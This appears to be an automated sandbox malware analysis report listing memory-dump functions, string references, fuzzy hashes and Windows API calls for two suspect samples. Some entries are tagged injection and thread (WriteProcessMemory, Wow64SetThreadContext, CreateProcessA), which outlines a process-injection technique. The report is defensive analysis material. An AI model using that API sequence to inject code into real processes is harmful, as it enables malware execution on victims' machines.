CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01704742

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 7f69fdd3a1874b7762595c71e60453e17a229bb68cfab1aaf22034ebbf1ebe19
Instruction ID: 248d913d81470bb8f0a787eb584cd23d466d2da2b7128adc9210b6d8c958827e
Opcode Fuzzy Hash: 7f69fdd3a1874b7762595c71e60453e17a229bb68cfab1aaf22034ebbf1ebe19
Instruction Fuzzy Hash: EB513B31A00229BAEF11EBA9DC89FFDB7A9EF15700F14009DD606A72C1E7719E458F54

Function 016DB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 016DB6BF

Strings

+, xrefs: 016DB65A
0, xrefs: 016DB66F
-, xrefs: 016DB650
0, xrefs: 016DB695

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: cc4ea423fd65e23e77bf6077ab55f635291a92768cd23f900ac6fa51d1a2158e
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: D981D030E052999FEF258E6CCC917FEBBB2AF46360F1F4119D861A7399C73488418B55

Function 016CBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01707B7F
RTL: Re-Waiting, xrefs: 01707BAC
RTL: Resource at %p, xrefs: 01707B8E

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: cff435f2427336ce3be008bf44fa192e9d5763a490c89394ce1d5f5191894780
Instruction ID: 7666088592a66616d80094d4dd895ba080295b3902d2079159c0fbc46def6a0f
Opcode Fuzzy Hash: cff435f2427336ce3be008bf44fa192e9d5763a490c89394ce1d5f5191894780
Instruction Fuzzy Hash: 7A41B0317047039BD725DE2DCC41B6AB7E5EB98B50F100A2DE9AA9B780DB71E8058B91

Function 016CB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0170728C

Strings

RTL: Re-Waiting, xrefs: 017072C1
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01707294
RTL: Resource at %p, xrefs: 017072A3

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: a2bce8fe6d697afbce8f41471176fcedfd67b8fafca3a2c4065b0f492ffea13a
Instruction ID: 6d769f06e83daddb6815f33e2f2c7c554389969d13913f60a77fbdf0f40fddf2
Opcode Fuzzy Hash: a2bce8fe6d697afbce8f41471176fcedfd67b8fafca3a2c4065b0f492ffea13a
Instruction Fuzzy Hash: 29411031609306ABC725CE29CC42B6AF7E5FB94B10F10461CF995AB280DB30F8168BD1

Function 016D7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 016D7E8B

Strings

-, xrefs: 016D7DDD
+, xrefs: 016D7DE8

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: 78534a15ea92d789a89ceeb2f6ce91ef977ecd850135ad0a39c53dfb988806c9
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: A591BF71E0021A9AEB34CF6DCC81ABEBBA5EF84328F14455AE955E73C0D7309941CB62

Function 01699126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 01699175
$, xrefs: 01699191

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: e42d82ffea1c1c0c706c003e2fbc4ba577b2e813a86ef4e3aaae9bdf13d9a176
Instruction ID: fbc2fee0d8bcf334896e806c2d250082045b9d7df9ff3ae0ee7fc8b2ead92896
Opcode Fuzzy Hash: e42d82ffea1c1c0c706c003e2fbc4ba577b2e813a86ef4e3aaae9bdf13d9a176
Instruction Fuzzy Hash: 198119B1D002699BDB31CB54CC54BEEBBB8AB48714F1041EEEA19B7240D7309E85CFA4

Analysis Process: IiIseKTckjhZgQ.exePID: 1628, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	11.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	217
Total number of Limit Nodes:	8

Executed Functions

Function 075A33C0 Relevance: 15.1, Strings: 10, Instructions: 2604COMMON

Download Yara Rule

Strings

4']q, xrefs: 075A4223
(o]q, xrefs: 075A3496
4|bq, xrefs: 075A61A8
4']q, xrefs: 075A602E
4']q, xrefs: 075A43AB
4']q, xrefs: 075A605E
4']q, xrefs: 075A5FD3
4|bq, xrefs: 075A61C3
$]q, xrefs: 075A6080
4']q, xrefs: 075A5291

Memory Dump Source

Source File: 0000000A.00000002.2319668932.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_75a0000_IiIseKTckjhZgQ.jbxd

Similarity

API ID:
String ID: (o]q$4']q$4']q$4']q$4']q$4']q$4']q$4|bq$4|bq$$]q
API String ID: 0-3618750947
Opcode ID: 20f0d05b230482dfc06270436745b884b95cfc6ce54eb154decae6f27b2dd1bb
Instruction ID: 0e89b16bb14ad05ad3ad936273bd47c83fd6268d3005b66743bed78b55439411
Opcode Fuzzy Hash: 20f0d05b230482dfc06270436745b884b95cfc6ce54eb154decae6f27b2dd1bb
Instruction Fuzzy Hash: 8C43FCB4A00219DFCB24CF68C888A9DB7B2BF49314F1585E9E519AB361DB31ED91CF50

Function 075A24F8 Relevance: 7.0, Strings: 5, Instructions: 723COMMON

Download Yara Rule

Strings

(o]q, xrefs: 075A2D8B
,aq, xrefs: 075A2B1F
(o]q, xrefs: 075A2D81
Haq, xrefs: 075A2DF8
,aq, xrefs: 075A2B0F

Memory Dump Source

Source File: 0000000A.00000002.2319668932.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_75a0000_IiIseKTckjhZgQ.jbxd

Similarity

API ID:
String ID: (o]q$(o]q$,aq$,aq$Haq
API String ID: 0-2157538030
Opcode ID: 8aee4f68d47fd181d215020131e726fff5011070e7896220c0a3f43dd385281f
Instruction ID: 663aaa19d7e8d522846fcac37b1ae9f4c4b86e8e844737246f053fa247e0b169
Opcode Fuzzy Hash: 8aee4f68d47fd181d215020131e726fff5011070e7896220c0a3f43dd385281f
Instruction Fuzzy Hash: 195280B5B00116AFCB58DF68C495AAD7BB2BFC8710F158169E906DB365DB30EC42CB90

Function 075AABA2 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2319668932.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_75a0000_IiIseKTckjhZgQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de525329f67eaee34dc258db010520b33e835b5a5e9bad9bfb68188f27736b1e
Instruction ID: 1b0a57e9e26d65817b05aebc1152c0cb8d8c1d495304cb25eb14530ca0d74c74
Opcode Fuzzy Hash: de525329f67eaee34dc258db010520b33e835b5a5e9bad9bfb68188f27736b1e
Instruction Fuzzy Hash: 8191F2B0D15219EFEB14DFA9D9847EDBBB2BF49300F10982AE419A7361DB744989CF40

Function 075AABB0 Relevance: .2, Instructions: 209COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2319668932.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_75a0000_IiIseKTckjhZgQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4705a47877d1865529968f1bf74982fead8d68c2823949a6f470fcaa678767c
Instruction ID: 66ac3a51b5eafbcea340766431aada3566bf4358288ef6a70b69149bb715d0f0
Opcode Fuzzy Hash: d4705a47877d1865529968f1bf74982fead8d68c2823949a6f470fcaa678767c
Instruction Fuzzy Hash: D181F2B0D15219EFEB14DFA9D484BEDBBB6BB49300F10982AE419A7351DB741989CF40

Function 075A9A38 Relevance: 7.7, Strings: 6, Instructions: 201
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LR]q, xrefs: 075A9C1D
LR]q, xrefs: 075A9C0F
LR]q, xrefs: 075A9AE8
$]q, xrefs: 075A9BB0
LR]q, xrefs: 075A9ADA
$]q, xrefs: 075A9BA0

Memory Dump Source

Source File: 0000000A.00000002.2319668932.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_75a0000_IiIseKTckjhZgQ.jbxd

Similarity

API ID:
String ID: LR]q$LR]q$LR]q$LR]q$$]q$$]q
API String ID: 0-2875722158
Opcode ID: 04039cb2d04c1b8672b5b33bb38cf92204136898869304d6be487fb10bf995c5
Instruction ID: d9254934e7e4c539363166b787011c8c4e0df7fee41e9aa35493540f07de6c94
Opcode Fuzzy Hash: 04039cb2d04c1b8672b5b33bb38cf92204136898869304d6be487fb10bf995c5
Instruction Fuzzy Hash: 9D71D1B1A14269EFCB148B6DC4947FDBBF2BB4A700F048577E196AB281CB34AD40CB51

Function 075A9A28 Relevance: 3.9, Strings: 3, Instructions: 183
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LR]q, xrefs: 075A9C0F
LR]q, xrefs: 075A9ADA
$]q, xrefs: 075A9BA0

Memory Dump Source

Source File: 0000000A.00000002.2319668932.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_75a0000_IiIseKTckjhZgQ.jbxd

Similarity

API ID:
String ID: LR]q$LR]q$$]q
API String ID: 0-2603884067
Opcode ID: 9e783fc17d5e20b307397556f59d0088b63f985183de901f19e01c543a726436
Instruction ID: bda601e4bc4c5481a05e3f32b611bd22805880823f84f017676618f6c12a9879
Opcode Fuzzy Hash: 9e783fc17d5e20b307397556f59d0088b63f985183de901f19e01c543a726436
Instruction Fuzzy Hash: BC61DFB1A14265EFDB108B69C4507FDBBF1BB46300F0885B7E196AB291CB78BE40CB51

Function 075AEF50 Relevance: 2.7, Strings: 2, Instructions: 178
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te]q, xrefs: 075AF11D
Te]q, xrefs: 075AF074

Memory Dump Source

Source File: 0000000A.00000002.2319668932.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_75a0000_IiIseKTckjhZgQ.jbxd

Similarity

API ID:
String ID: Te]q$Te]q
API String ID: 0-3320153681
Opcode ID: 0b7446773989b4a1f6c9bcccf423499628f2ea5e46942db7a690902133ad6f34
Instruction ID: 11d366b7122f8c64ec94921624c3ee471e7903147784703d2c9698daea996239
Opcode Fuzzy Hash: 0b7446773989b4a1f6c9bcccf423499628f2ea5e46942db7a690902133ad6f34
Instruction Fuzzy Hash: 8A61E7B4E14209DFDB08DFA9C885AEDBBF6FF89300F10942AD519AB355DB309906CB50

Function 075AEED3 Relevance: 2.7, Strings: 2, Instructions: 169
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te]q, xrefs: 075AF11D
Te]q, xrefs: 075AF074

Memory Dump Source

Source File: 0000000A.00000002.2319668932.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_75a0000_IiIseKTckjhZgQ.jbxd

Similarity

API ID:
String ID: Te]q$Te]q
API String ID: 0-3320153681
Opcode ID: 82d0314b9c8812af8d684557377ae82dd7603127e69a0297a76d3f0e72efd0bf
Instruction ID: a0ca9321606782a454a3fa9d10b48a87a97f4d84f50ed04c82b70e22ff1315dd
Opcode Fuzzy Hash: 82d0314b9c8812af8d684557377ae82dd7603127e69a0297a76d3f0e72efd0bf
Instruction Fuzzy Hash: 3A5116B4E14209DFDB08CFA9D945AEDBBB6FF89300F10852AD419AB394DB309946CF50

Function 075AEF40 Relevance: 2.7, Strings: 2, Instructions: 156
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te]q, xrefs: 075AF11D
Te]q, xrefs: 075AF074

Memory Dump Source

Source File: 0000000A.00000002.2319668932.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_75a0000_IiIseKTckjhZgQ.jbxd

Similarity

API ID:
String ID: Te]q$Te]q
API String ID: 0-3320153681
Opcode ID: 7ac483227cb92a1605f1a3046cd44b4e147deb87c6faf7e35b9080e61c292091
Instruction ID: 4e571d85dd17ac34ee8219bb37848061d1e0c9abada1d9005d389e8e1f21d109
Opcode Fuzzy Hash: 7ac483227cb92a1605f1a3046cd44b4e147deb87c6faf7e35b9080e61c292091
Instruction Fuzzy Hash: 4B51F6B4E15209DFDB08CFE9C945AEDBBB6BF89300F10842AD419AB394DB309906CF50

Function 075AA7D0 Relevance: 2.6, Strings: 2, Instructions: 105
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 075AA8D9
$]q, xrefs: 075AA8CD

Memory Dump Source

Source File: 0000000A.00000002.2319668932.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_75a0000_IiIseKTckjhZgQ.jbxd

Similarity

API ID:
String ID: $]q$$]q
API String ID: 0-127220927
Opcode ID: ffb37e4c3efc8d91f27a7b5cacb7e85709fc17a43f0abb71720e99d5b7d7bb45
Instruction ID: c3ce18a270f546fd6cdb89da785b2394b50fcca890a222f9b7248f4c92bdbb47
Opcode Fuzzy Hash: ffb37e4c3efc8d91f27a7b5cacb7e85709fc17a43f0abb71720e99d5b7d7bb45
Instruction Fuzzy Hash: B831B2B1A18696EFD7118B7D88406FFFBB1BB46210F04C97BE5A2C7292D234D982C711

Function 075A6778 Relevance: 2.6, Strings: 2, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 075A6DDD
$]q, xrefs: 075A6DF3

Memory Dump Source

Source File: 0000000A.00000002.2319668932.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_75a0000_IiIseKTckjhZgQ.jbxd

Similarity

API ID:
String ID: $]q$$]q
API String ID: 0-127220927
Opcode ID: 37d9c267df135a29ceff5070da89cac2aa4661453a53d59a75c14339c886c2fa
Instruction ID: d4d6cacc2993acd54b9c0b21e61424d0372d2d17ecb5e2f6f166da044d94a129
Opcode Fuzzy Hash: 37d9c267df135a29ceff5070da89cac2aa4661453a53d59a75c14339c886c2fa
Instruction Fuzzy Hash: 7331C2B0911628DBDB68CF69CC44BD9B7B2BB89305F1485EAD4096B354CB345E89CF41

Function 07C05C58 Relevance: 1.8, APIs: 1, Instructions: 255
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07C05EA6

Memory Dump Source

Source File: 0000000A.00000002.2320056353.0000000007C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7c00000_IiIseKTckjhZgQ.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 206bac7baa2e8f0b9b5bd8312eca5c6d9aa74cb697371526f9b06e84d38f45a6
Instruction ID: b693d78df19d695f12b7e0693fa1be8cc802c1390f48d1d16b38be8632ef3579
Opcode Fuzzy Hash: 206bac7baa2e8f0b9b5bd8312eca5c6d9aa74cb697371526f9b06e84d38f45a6
Instruction Fuzzy Hash: 96A15DB1D003198FDB20CF68D985BEDBBB2BF44314F14816AD859A7280DB749A95CFD2

Function 07C05C70 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07C05EA6

Memory Dump Source

Source File: 0000000A.00000002.2320056353.0000000007C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7c00000_IiIseKTckjhZgQ.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 0c75fb729260da60e1d0a3a98aadc5ef65b0ed50202265090bdc36d587fde071
Instruction ID: c0b2745046fda32eb921e0453aad7dee03744b8b45f43c1aed8d4b46ab21dc25
Opcode Fuzzy Hash: 0c75fb729260da60e1d0a3a98aadc5ef65b0ed50202265090bdc36d587fde071
Instruction Fuzzy Hash: F6915EB1D003198FDB20CF68D985BEDBBB2BF44314F148169D819A7280DB749A95CFD2

Function 0306ACE8 Relevance: 1.7, APIs: 1, Instructions: 205
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0306AF3E

Memory Dump Source

Source File: 0000000A.00000002.2276809219.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3060000_IiIseKTckjhZgQ.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 92cc8336313a8710f60a937381252099adc19cd75771ba19282808ffca612496
Instruction ID: 32ca156180ba94a9f6ac7a79fca14c992055aa72f9ca9e057b6fd96681aefd67
Opcode Fuzzy Hash: 92cc8336313a8710f60a937381252099adc19cd75771ba19282808ffca612496
Instruction Fuzzy Hash: 698199B0A01B058FD764EF69D04079ABBF1FF88304F14892DD48AEBA45D775E84ACB91

Function 030658EC Relevance: 1.6, APIs: 1, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 030659A9

Memory Dump Source

Source File: 0000000A.00000002.2276809219.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3060000_IiIseKTckjhZgQ.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: fc9c6f2cbb1060688ac8ad546538279357a255187d1f736ef4ee77fd97615120
Instruction ID: d03ca0c99d1733ac6759743f3050b6123be8e3c640de5a4fe7e8569ec206796f
Opcode Fuzzy Hash: fc9c6f2cbb1060688ac8ad546538279357a255187d1f736ef4ee77fd97615120
Instruction Fuzzy Hash: 8141CFB0C00619CFDB24DFA9C884BDDBBF5BF4A304F24806AD408AB255DB71694ACF91

Function 030644B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 030659A9

Memory Dump Source

Source File: 0000000A.00000002.2276809219.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3060000_IiIseKTckjhZgQ.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: d6245dc43bbbd14ea8eb95c901c425bcc948eeecf95025901936f3b6720aa18c
Instruction ID: 8b7982bf6af5228be24bc3946182e7341aa2b8837eacadc1ad8f3564326d158d
Opcode Fuzzy Hash: d6245dc43bbbd14ea8eb95c901c425bcc948eeecf95025901936f3b6720aa18c
Instruction Fuzzy Hash: DE41DFB0D0071DCBDB24DFA9C888A9EBBF5BF49304F20806AD408AB255DB716949CF91

Function 07C055E1 Relevance: 1.6, APIs: 1, Instructions: 75injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07C05678

Memory Dump Source

Source File: 0000000A.00000002.2320056353.0000000007C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7c00000_IiIseKTckjhZgQ.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 007524c4d8e6eeab8baae594215bfef2b84321f06f744675fac78ec711c42a81
Instruction ID: 5ee690c77f899d75d8c8cd4895819f6f242370a68ffcf7adaa2a43f83145276d
Opcode Fuzzy Hash: 007524c4d8e6eeab8baae594215bfef2b84321f06f744675fac78ec711c42a81
Instruction Fuzzy Hash: 6B2137B59003099FCB10CFA9D985BEEBBF5FF48310F10842AE519A7240C7749A55CBA1

Function 07C056D0 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07C05758

Memory Dump Source

Source File: 0000000A.00000002.2320056353.0000000007C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7c00000_IiIseKTckjhZgQ.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: c9065268a0e9249852c62345efbe51f39b08a2549a481f904338854c126457d7
Instruction ID: ca3d1528e583c75282910bee126a29d32e70d7f6333fd008eb78e8fc5890aadc
Opcode Fuzzy Hash: c9065268a0e9249852c62345efbe51f39b08a2549a481f904338854c126457d7
Instruction Fuzzy Hash: 242148B5C003499FCB10DFAAD985AEEFBF5FF48320F10842AE519A3240C7399645DBA1

Function 07C055E8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07C05678

Memory Dump Source

Source File: 0000000A.00000002.2320056353.0000000007C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7c00000_IiIseKTckjhZgQ.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 1a7bc6b7c5e945dc999f6699efe615d4b50dcd23f02fcfcdc3db62d1a37fdb1f
Instruction ID: 5a53c93ebb75f6b9d1a38c763abc52fd7d64e3ed4b50a7de41c1cb1f3bdb1da0
Opcode Fuzzy Hash: 1a7bc6b7c5e945dc999f6699efe615d4b50dcd23f02fcfcdc3db62d1a37fdb1f
Instruction Fuzzy Hash: DB2113B59003499FCB10DFA9C885BEEBBF5FF88310F10842AE919A7240D7789955CBA1

Function 07C05010 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07C05096

Memory Dump Source

Source File: 0000000A.00000002.2320056353.0000000007C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7c00000_IiIseKTckjhZgQ.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: b43f6a8163640091a683d255d9adc67251704591d85c0ccfa1b043a8efb80593
Instruction ID: c38dee82c85b4ea04a6bc7064bfa3d7be637ab109beff60debcab2693f820b63
Opcode Fuzzy Hash: b43f6a8163640091a683d255d9adc67251704591d85c0ccfa1b043a8efb80593
Instruction Fuzzy Hash: 392136B5D002099FDB10DFAAD485BEEBBF4BB89224F10842AD419A7240D7789A45CFA1

Function 0306D1BC Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0306D596,?,?,?,?,?), ref: 0306D657

Memory Dump Source

Source File: 0000000A.00000002.2276809219.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3060000_IiIseKTckjhZgQ.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 31c9751ad7939b98b00e2612aeb66aa0e44b469cc53a61365c92b8e6b989ff21
Instruction ID: d7d6a3f94eba45a353e8a609ed23d23d7773975687cfa1ae1f2dfbff90d17d09
Opcode Fuzzy Hash: 31c9751ad7939b98b00e2612aeb66aa0e44b469cc53a61365c92b8e6b989ff21
Instruction Fuzzy Hash: F82103B5D00248AFDB10CF9AD484AEEBBF8EB48310F14842AE918A3310D374A940DFA5

Function 0306AF70 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0306AF3E

Memory Dump Source

Source File: 0000000A.00000002.2276809219.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3060000_IiIseKTckjhZgQ.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: c92caea68e6f488839e39425548d759f02adb9f304e9f25a97dcafa2db9508fa
Instruction ID: 1ae3dc75ffa47669140b989c7edf3aa5cc9b62043526d47fd71fa7a74a2a5d0a
Opcode Fuzzy Hash: c92caea68e6f488839e39425548d759f02adb9f304e9f25a97dcafa2db9508fa
Instruction Fuzzy Hash: 831181F5B053448FEB10EB9AD8007ABBBF9DFC5314F0984AAD405FB255C6759805CBA2

Function 07C056D8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07C05758

Memory Dump Source

Source File: 0000000A.00000002.2320056353.0000000007C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7c00000_IiIseKTckjhZgQ.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 6491f483eb9c97cf041a63b7e8469f8ebf8580d2a8409fa005ce01183166ab19
Instruction ID: 9f544423e186539528467f3394708e81c0fbf1b0ed514e7991cc8ef5b4f1a28e
Opcode Fuzzy Hash: 6491f483eb9c97cf041a63b7e8469f8ebf8580d2a8409fa005ce01183166ab19
Instruction Fuzzy Hash: F12128B1C003499FCB10DFAAC885AEEFBF5FF48310F108429E519A7240C7749551DBA1

Function 07C05018 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07C05096

Memory Dump Source

Source File: 0000000A.00000002.2320056353.0000000007C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7c00000_IiIseKTckjhZgQ.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: ed1d667f569bcb10a03168da4648dec83a6bb2e58973a5c3910ee68218321e28
